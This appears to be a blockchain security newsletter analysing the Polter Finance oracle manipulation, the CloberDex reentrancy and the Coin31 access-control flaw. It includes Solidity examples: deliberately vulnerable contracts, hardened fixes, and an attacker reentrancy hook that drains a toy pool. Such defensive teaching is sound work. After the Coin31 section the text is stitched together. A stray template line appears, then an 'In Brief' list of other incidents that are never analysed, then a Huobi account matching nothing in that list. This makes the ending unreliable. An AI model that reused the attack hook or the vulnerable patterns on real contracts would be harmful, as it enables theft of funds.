Polter’s $12M Oracle Exploit, CloberDex’s Reentrancy, and Coin31’s Access Control Failure
Polter Finance lost $12M when its oracle overvalued 1 BOO token at $1.37T, letting the attacker drain lending pools. CloberDex suffered a $514K loss due to a reentrancy flaw in its burnHook logic. Coin31 was drained for $26K after a public setMaster() function allowed unauthorized contract control.
In Brief
A reentrancy flaw caused CloberDex a $514K loss.
Polter Finance suffered a $12M price manipulation attack.
Coin31’s access control vulnerability resulted in a $26K loss.
Hacks Analysis
CloberDex | Amount Lost: $514K
On December 10th, the CloberDex exploit on the Base network resulted in a $514K loss. The root cause was a reentrancy vulnerability in the _burn() function of the Rebalancer contract: the burnHook callback was invoked before pool.reserveA and pool.reserveB were updated. An attacker-controlled hook could therefore re-enter the function while the reserves still reflected the pre-withdrawal state and be paid again against those stale values, repeatedly withdrawing inflated amounts. The CloberDex team has acknowledged the incident and paused all transactions.
Exploited Contract (on Base): 0x6a0b87d6b74f7d5c92722f6a11714dbeda9f3895
Private Contract with burnHook function: 0x32Fb1BedD95BF78ca2c6943aE5AEaEAAFc0d97C1
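The ordering bug described above, as an added illustration that is not CloberDex's Rebalancer code: a burn() that debits shares, runs the user's burnHook, and only afterwards decrements the reserves, next to the checks-effects-interactions ordering that removes the problem, plus the hook a re-entrant caller would register. The pool layout, share accounting, hook signature and the setHook/attack entry points are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not CloberDex's Rebalancer code. Pool layout, share
// accounting, hook signature and setHook() are assumptions for the example.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

interface IBurnHook {
    function burnHook(address user, uint256 amountA, uint256 amountB) external;
}

abstract contract PoolBase {
    struct Pool { IERC20 tokenA; IERC20 tokenB; uint256 reserveA; uint256 reserveB; uint256 totalShares; }
    Pool public pool;
    mapping(address => uint256) public sharesOf;
    IBurnHook public hook; // per-pool strategy contract, assumed user-deployable

    function setHook(IBurnHook h) external { hook = h; } // access control elided for brevity

    // Pro-rata payout: shares / supply of the current reserves.
    function _payout(uint256 shares, uint256 supply) internal view returns (uint256 amountA, uint256 amountB) {
        amountA = pool.reserveA * shares / supply;
        amountB = pool.reserveB * shares / supply;
    }
}

// Vulnerable ordering: shares are burned, the hook runs, tokens are sent, and
// only then are the reserves decremented. During the hook the supply is already
// smaller but reserveA/reserveB still hold their pre-withdrawal values, so a
// re-entrant burn() is paid reserve * shares / (reduced supply): more per share
// than the honest rate, at every nesting level.
contract VulnerableRebalancer is PoolBase {
    function burn(uint256 shares) external {
        require(sharesOf[msg.sender] >= shares, "insufficient shares");
        uint256 supply = pool.totalShares;
        sharesOf[msg.sender] -= shares;
        pool.totalShares -= shares;
        (uint256 amountA, uint256 amountB) = _payout(shares, supply);

        if (address(hook) != address(0)) {
            hook.burnHook(msg.sender, amountA, amountB); // <-- re-entry point, reserves stale
        }
        pool.tokenA.transfer(msg.sender, amountA);
        pool.tokenB.transfer(msg.sender, amountB);

        pool.reserveA -= amountA; // effects applied too late
        pool.reserveB -= amountB;
    }
}

// Hardened ordering: every state change lands before any external call, and a
// mutex rejects nested entry outright as defence in depth.
contract HardenedRebalancer is PoolBase {
    uint256 private locked = 1;
    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    function burn(uint256 shares) external nonReentrant {
        require(sharesOf[msg.sender] >= shares, "insufficient shares");
        (uint256 amountA, uint256 amountB) = _payout(shares, pool.totalShares);

        sharesOf[msg.sender] -= shares; // effects first
        pool.totalShares -= shares;
        pool.reserveA -= amountA;
        pool.reserveB -= amountB;

        if (address(hook) != address(0)) {
            hook.burnHook(msg.sender, amountA, amountB); // interactions last
        }
        require(pool.tokenA.transfer(msg.sender, amountA), "transfer A failed");
        require(pool.tokenB.transfer(msg.sender, amountB), "transfer B failed");
    }
}

// Attacker-side hook for the vulnerable contract; it must hold shares and be
// registered via setHook(). Hypothetical figures: reserves 1000/1000, supply
// 100, 50 attacker shares. Burning 25 with one re-entry pays 250 + 333 of each
// token (second call uses supply 75) instead of the fair 500.
contract ReentrantHook is IBurnHook {
    VulnerableRebalancer public immutable target;
    uint256 private remaining;
    uint256 private sharesPerCall;

    constructor(VulnerableRebalancer t) { target = t; }

    function attack(uint256 shares, uint256 reentries) external {
        sharesPerCall = shares;
        remaining = reentries;
        target.burn(shares);
    }

    function burnHook(address, uint256, uint256) external override {
        require(msg.sender == address(target), "unexpected caller");
        if (remaining > 0) {
            remaining--;
            target.burn(sharesPerCall); // supply already reduced, reserves not yet
        }
    }
}
```

The mutex alone would have stopped the nested call, but it is the ordering change that makes burn() correct: with reserves and supply settled before the callback, a hook that re-enters sees the same state any other caller would, and the honest rate applies.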
Polter Finance | Amount Lost: $12M
On November 16th, the Polter Finance exploit on the Fantom network resulted in a $12M loss. The attacker used flash loans to skew SpookySwap's BOO liquidity pools, inflating the BOO token price. They then deposited 1 BOO as collateral, which the oracle, reading the manipulated pool price, valued at $1.37 trillion. Against this overvalued collateral the attacker borrowed 9.1M wFTM, draining the protocol's lending pool. The oracle's latestRoundData() returned the spiked price as a valid answer; nothing in the price path rejected a move of that size, so the manipulated value passed straight into the collateral calculation.
BOO Token (on Fantom): 0x841fad6eae12c286d1fd18d1d525dffa75c7effe
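The two pricing approaches at issue above, as an added example that is not Polter Finance's or SpookySwap's code: a spot price read directly from a pair's reserves, which a flash loan can move within a single transaction, next to a time-weighted price built from the pair's cumulative price counters with a maximum-deviation bound, and a lending-side consumer that validates what latestRoundData() returns. The UniswapV2-style pair interface (which SpookySwap follows) is real; the contract names, the 30-minute window, the 10% bound and the 1-hour staleness limit are assumptions, and the choice of a TWAP as the fix is this example's, not something the page attributes to the protocol.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not Polter Finance or SpookySwap code. Contract names,
// window length, deviation bound and staleness limit are assumptions.

interface IUniswapV2Pair {
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint256);
}

// Vulnerable pattern: token0 priced from the reserves at the moment of the call.
// A flash loan that pushes token1 into the pair inflates this for one transaction,
// which is long enough to deposit collateral and borrow against it.
contract SpotPriceOracle {
    IUniswapV2Pair public pair;
    constructor(IUniswapV2Pair p) { pair = p; }

    function price0() external view returns (uint256) {
        (uint112 r0, uint112 r1,) = pair.getReserves();
        return uint256(r1) * 1e18 / r0; // 18-decimal price of token0 in token1
    }
}

// Hardened pattern: average price over a window, updated at most once per
// window, with a bound on how far one update may move the answer.
contract TwapOracle {
    IUniswapV2Pair public pair;
    uint32 public constant WINDOW = 30 minutes;
    uint256 public constant MAX_DEVIATION_BPS = 1_000; // 10 %

    uint256 private cumAtCheckpoint;
    uint32 private tsAtCheckpoint;
    uint256 public lastAnswer; // last accepted price, 18 decimals

    constructor(IUniswapV2Pair p) {
        pair = p;
        (cumAtCheckpoint, tsAtCheckpoint) = _currentCumulative();
    }

    // price0CumulativeLast only advances when the pair is touched, so extend it
    // to "now" with the reserves of the last update (UQ112x112, wraps by design).
    function _currentCumulative() internal view returns (uint256 cum, uint32 ts) {
        (uint112 r0, uint112 r1, uint32 last) = pair.getReserves();
        cum = pair.price0CumulativeLast();
        ts = uint32(block.timestamp);
        if (ts != last) {
            unchecked { cum += ((uint256(r1) << 112) / r0) * (ts - last); }
        }
    }

    function update() external {
        (uint256 cum, uint32 ts) = _currentCumulative();
        uint32 elapsed = ts - tsAtCheckpoint;
        require(elapsed >= WINDOW, "window not elapsed");
        uint256 avg;
        unchecked { avg = (cum - cumAtCheckpoint) / elapsed; } // average UQ112x112 price
        uint256 price = (avg * 1e18) >> 112;
        require(price > 0, "zero price");
        if (lastAnswer != 0) {
            uint256 diff = price > lastAnswer ? price - lastAnswer : lastAnswer - price;
            require(diff * 10_000 <= lastAnswer * MAX_DEVIATION_BPS, "price moved too far");
        }
        lastAnswer = price;
        cumAtCheckpoint = cum;
        tsAtCheckpoint = ts;
    }

    // Chainlink-shaped accessor so lending code can keep calling latestRoundData().
    function latestRoundData() external view returns (uint80, int256, uint256, uint256, uint80) {
        return (0, int256(lastAnswer), 0, tsAtCheckpoint, 0);
    }
}

interface IAggregator {
    function latestRoundData() external view returns (uint80, int256, uint256, uint256, uint80);
}

// Consumer-side checks: a positive answer and a fresh one. Neither would have
// caught a spot-price spike on its own, which is why the oracle itself bounds
// the move; the consumer still refuses an unset or stale feed.
contract CollateralValuer {
    IAggregator public oracle;
    uint256 public constant MAX_AGE = 1 hours;
    constructor(IAggregator o) { oracle = o; }

    function collateralValue(uint256 amount) external view returns (uint256) {
        (, int256 answer,, uint256 updatedAt,) = oracle.latestRoundData();
        require(answer > 0, "invalid answer");
        require(block.timestamp - updatedAt <= MAX_AGE, "stale price");
        return amount * uint256(answer) / 1e18;
    }
}
```

A flash loan that moves the pair inside one transaction barely moves a 30-minute average, and even a sustained manipulation is capped at the deviation bound per update, so the trillion-dollar valuation could not reach the collateral calculation. In production the TWAP would be one input alongside an independent feed rather than the only source.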
Coin31 | Amount Lost: $26K
On November 2nd, the Coin31 exploit on the BNB chain resulted in a $26K loss. The root cause was a missing access control check on the setMaster() function of the token contract: any caller could set the master address. The attacker pointed it at their own contract, gaining the master's privileges over the Coin31 token pool, and used them to drain tokens from the pool. The Coin31 team has acknowledged the incident.
Exploited Contract (on BNB): 0x52fbd9a94587f8ce757d1bd0a89abfe8d6233591
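The access control failure described above, as an added illustration that is not the Coin31 contract: a pool whose privileged "master" can move tokens out, with an unprotected setter next to a hardened version that restricts the setter to the owner and makes the handover two-step. The pool's withdraw path and the owner/master split are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not the Coin31 contract. The withdraw path and the
// owner/master split are assumptions for the example.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

contract VulnerableTokenPool {
    IERC20 public token;
    address public master;

    constructor(IERC20 t) { token = t; master = msg.sender; }

    // BUG: no access control. Any account can make itself (or its contract)
    // the master and then call withdraw().
    function setMaster(address newMaster) external {
        master = newMaster;
    }

    function withdraw(address to, uint256 amount) external {
        require(msg.sender == master, "not master");
        token.transfer(to, amount);
    }
}

contract HardenedTokenPool {
    IERC20 public immutable token;
    address public owner;
    address public master;
    address public pendingMaster;

    event MasterProposed(address indexed current, address indexed proposed);
    event MasterChanged(address indexed previous, address indexed current);

    modifier onlyOwner() { require(msg.sender == owner, "not owner"); _; }

    constructor(IERC20 t) { token = t; owner = msg.sender; master = msg.sender; }

    // Only the owner may nominate, and the nominee must accept, so neither an
    // outsider nor a mistyped address can take over the role.
    function proposeMaster(address newMaster) external onlyOwner {
        require(newMaster != address(0), "zero address");
        pendingMaster = newMaster;
        emit MasterProposed(master, newMaster);
    }

    function acceptMaster() external {
        require(msg.sender == pendingMaster, "not pending master");
        emit MasterChanged(master, msg.sender);
        master = msg.sender;
        pendingMaster = address(0);
    }

    function withdraw(address to, uint256 amount) external {
        require(msg.sender == master, "not master");
        require(token.transfer(to, amount), "transfer failed");
    }
}
```

The audit check is mechanical: every function that writes a privileged address, or anything that gates a transfer, needs a modifier or an explicit msg.sender check, and the events make any change visible to monitoring.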
Follow-up: Conduct a follow-up review to ensure that the remediation steps were effective and that the smart contract is now secure.
In Brief
Remitano suffered a $2.7M loss due to a private key compromise.
GAMBL’s recommendation system was exploited.
DAppSocial lost $530K due to a logic vulnerability.
Rocketswap’s private keys were inadvertently deployed on the server.
Hacks Analysis
Huobi | Amount Lost: $8M
On September 24th, the Huobi Global exploit on the Ethereum Mainnet resulted in an $8 million loss due to the compromise of private keys. The attacker executed the attack in a single transaction by sending 4,999 ETH to a malicious contract. The attacker then created a second malicious contract and transferred 1,001 ETH to it. Huobi has since confirmed that it has identified the attacker and has offered a 5% white hat bounty if the funds are returned to the exchange.